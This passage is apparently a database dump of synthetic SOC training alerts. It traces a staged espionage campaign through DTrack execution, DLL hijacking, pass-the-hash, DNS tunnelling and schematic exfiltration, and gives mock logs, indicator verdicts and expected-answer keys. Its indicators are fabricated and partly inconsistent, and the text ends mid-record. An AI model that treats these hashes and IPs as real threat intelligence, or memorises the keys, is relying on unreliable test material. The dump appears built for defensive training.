(492, 'Execution of DTrack Payload', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the malicious attachment, a macro executes, downloading the DTrack payload onto the victim\'s machine, marking the next phase of the attack.', 'Execution', 'T1204: User Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.15\",\"file_created\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\DTrackPayload.exe\",\"file_hash\":\"d4e5f6a7b8c9d0e1f2g3h4i5j6k7l8m9\",\"process_name\":\"macro_loader.exe\",\"process_command_line\":\"macro_loader.exe -d C:\\\\Users\\\\jdoe\\\\Documents\\\\malicious.docm\",\"process_id\":\"6789\",\"parent_process\":\"WINWORD.EXE\",\"parent_process_id\":\"1234\"}', '2026-01-05 04:01:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d4e5f6a7b8c9d0e1f2g3h4i5j6k7l8m9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"DTrack malware sample\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"DTrackPayload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection and Response\",\"verdict\":\"suspicious\",\"details\":\"Unusual execution detected\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Valid user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(493, 'Establishing Persistence with DLL Hijacking', 'high', 'System Logs', 'The attackers utilize DLL hijacking techniques to embed DTrack into legitimate processes, allowing them to maintain a foothold within the network.', 'Persistence', 'T1574.001 - DLL Search Order Hijacking', 1, 'new', NULL, '{\"event_id\":4624,\"timestamp\":\"2023-10-15T14:32:00Z\",\"computer_name\":\"compromised-host.local\",\"user_name\":\"compromised_user\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"10.0.0.12\",\"process_name\":\"C:\\\\Program Files\\\\LegitApp\\\\LegitApp.exe\",\"injected_dll\":\"C:\\\\Windows\\\\System32\\\\hijacked.dll\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"event_description\":\"DLL hijacking detected in LegitApp.exe with injected DLL hijacked.dll\"}', '2026-01-05 04:01:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with DTrack malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Program Files\\\\LegitApp\\\\LegitApp.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"DLL used for persistence by malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.104Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4624,\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user_name\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.12\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\LegitApp.exe\\\",\\\"injected_dll\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hijacked.dll\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"event_description\\\":\\\"DLL hijacking detected in LegitApp.exe with injected DLL hijacked.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.104Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4624,\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user_name\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.12\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\LegitApp.exe\\\",\\\"injected_dll\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hijacked.dll\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"event_description\\\":\\\"DLL hijacking detected in LegitApp.exe with injected DLL hijacked.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.104Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4624,\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user_name\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.12\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\LegitApp.exe\\\",\\\"injected_dll\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hijacked.dll\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"event_description\\\":\\\"DLL hijacking detected in LegitApp.exe with injected DLL hijacked.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.104Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4624,\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user_name\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.12\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\LegitApp.exe\\\",\\\"injected_dll\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hijacked.dll\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"event_description\\\":\\\"DLL hijacking detected in LegitApp.exe with injected DLL hijacked.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.104Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4624,\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user_name\\\":\\\"compromised_user\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"destination_ip\\\":\\\"10.0.0.12\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Program Files\\\\\\\\LegitApp\\\\\\\\LegitApp.exe\\\",\\\"injected_dll\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hijacked.dll\\\",\\\"malware_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"event_description\\\":\\\"DLL hijacking detected in LegitApp.exe with injected DLL hijacked.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(494, 'Lateral Movement Detected via Pass-the-Hash', 'high', 'Network Traffic Analysis', 'An attacker has been detected moving laterally across the network using Pass-the-Hash technique. The attacker used stolen credentials to access multiple internal systems, searching for sensitive schematics related to tank and laser weaponry.', 'Lateral Movement', 'T1075', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_type\":\"network_connection\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"internal_user1\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_accessed\":\"tank_schematics_v3.pdf\",\"action\":\"login_success\",\"protocol\":\"SMB\",\"destination_ports\":[445,139],\"note\":\"Suspicious access pattern detected using Pass-the-Hash.\"}', '2026-01-05 04:01:18', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal asset, department: R&D\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"internal_user1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Account used in abnormal access pattern.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Database\",\"verdict\":\"suspicious\",\"details\":\"Potential credential dump hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(495, 'Exfiltration of Sensitive Schematics', 'critical', 'Data Loss Prevention (DLP) Logs', 'The attackers have successfully exfiltrated sensitive defense schematics using encrypted channels. This marks the final stage of their espionage mission.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-10T03:45:27Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"TLS\",\"file_sha256\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"sensitive_schematics_v5.pdf\",\"user\":\"jdoe_internal\",\"outbound_channel\":\"encrypted_tunnel\",\"actions_taken\":[\"file_transfer\"],\"status\":\"completed\"}', '2026-01-05 04:01:18', '2026-02-16 18:19:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known exfiltration tool\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"sensitive_schematics_v5.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"internal\",\"details\":\"Classified document\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe_internal\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials possibly compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T03:45:27Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"file_sha256\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"filename\\\":\\\"sensitive_schematics_v5.pdf\\\",\\\"user\\\":\\\"jdoe_internal\\\",\\\"outbound_channel\\\":\\\"encrypted_tunnel\\\",\\\"actions_taken\\\":[\\\"file_transfer\\\"],\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T03:45:27Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"file_sha256\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"filename\\\":\\\"sensitive_schematics_v5.pdf\\\",\\\"user\\\":\\\"jdoe_internal\\\",\\\"outbound_channel\\\":\\\"encrypted_tunnel\\\",\\\"actions_taken\\\":[\\\"file_transfer\\\"],\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T03:45:27Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"file_sha256\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"filename\\\":\\\"sensitive_schematics_v5.pdf\\\",\\\"user\\\":\\\"jdoe_internal\\\",\\\"outbound_channel\\\":\\\"encrypted_tunnel\\\",\\\"actions_taken\\\":[\\\"file_transfer\\\"],\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T03:45:27Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"file_sha256\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"filename\\\":\\\"sensitive_schematics_v5.pdf\\\",\\\"user\\\":\\\"jdoe_internal\\\",\\\"outbound_channel\\\":\\\"encrypted_tunnel\\\",\\\"actions_taken\\\":[\\\"file_transfer\\\"],\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.107Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T03:45:27Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"file_sha256\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"filename\\\":\\\"sensitive_schematics_v5.pdf\\\",\\\"user\\\":\\\"jdoe_internal\\\",\\\"outbound_channel\\\":\\\"encrypted_tunnel\\\",\\\"actions_taken\\\":[\\\"file_transfer\\\"],\\\"status\\\":\\\"completed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(496, 'Suspicious Domain Access Detected', 'medium', 'Firewall Logs', 'The attackers initiated their campaign by accessing a compromised domain to deliver the Matryoshka RAT to the ministry\'s network, marking the beginning of their infiltration.', 'Initial Access', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'resolved', 34, '{\"timestamp\":\"2023-10-25T14:23:45Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.5.23\",\"dst_port\":\"80\",\"protocol\":\"HTTP\",\"domain\":\"compromise-domain.example.com\",\"url\":\"http://compromise-domain.example.com/matryoshka_rat.exe\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"matryoshka_rat.exe\",\"action\":\"allowed\"}', '2026-01-05 04:03:10', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"compromise-domain.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenDNS\",\"verdict\":\"malicious\",\"details\":\"Domain used for malware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches Matryoshka RAT sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"matryoshka_rat.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename associated with Matryoshka RAT.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(497, 'Matryoshka RAT Execution', 'high', 'EDR systems', 'Having gained initial access, the attackers execute the Matryoshka RAT on the infected systems, establishing a foothold and enabling further malicious activity. The EDR system detected the execution of a suspicious file associated with the Matryoshka RAT.', 'Execution', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:32:00Z\",\"event_id\":\"1001\",\"computer_name\":\"compromised-host.local\",\"user_name\":\"compromised_user\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\matryoshka.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_id\":\"5678\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"203.0.113.45\",\"activity\":\"Execution of suspicious file\",\"signature\":\"Matryoshka RAT\"}', '2026-01-05 04:03:13', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known signature of Matryoshka RAT\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"matryoshka.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal EDR\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used by Matryoshka RAT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(498, 'DNS Tunneling Activity Identified', 'high', 'DNS logs', 'To ensure sustained access, the attackers employ DNS tunneling, using Matryoshka RAT to communicate with their command and control (C2) server undetected.', 'Persistence', 'T1071.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:00Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"103.21.244.15\",\"dns_query\":\"subdomain.example.com\",\"dns_response\":\"NXDOMAIN\",\"protocol\":\"UDP\",\"port\":53,\"query_type\":\"A\",\"malware_hash\":\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\",\"username\":\"jdoe\",\"filename\":\"matryoshka_rat.dll\"}', '2026-01-05 04:03:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"103.21.244.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with DNS tunneling\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash identified with Matryoshka RAT\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"matryoshka_rat.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"File associated with Matryoshka RAT\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.110Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"103.21.244.15\\\",\\\"dns_query\\\":\\\"subdomain.example.com\\\",\\\"dns_response\\\":\\\"NXDOMAIN\\\",\\\"protocol\\\":\\\"UDP\\\",\\\"port\\\":53,\\\"query_type\\\":\\\"A\\\",\\\"malware_hash\\\":\\\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"matryoshka_rat.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.110Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:00Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"103.21.244.15\\\",\\\"dns_query\\\":\\\"subdomain.example.com\\\",\\\"dns_response\\\":\\\"NXDOMAIN\\\",\\\"protocol\\\":\\\"UDP\\\",\\\"port\\\":53,\\\"query_type\\\":\\\"A\\\",\\\"malware_hash\\\":\\\"58e6c2cd47d9b5f8203d8a7c84d8f8c9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"matryoshka_rat.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.110Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 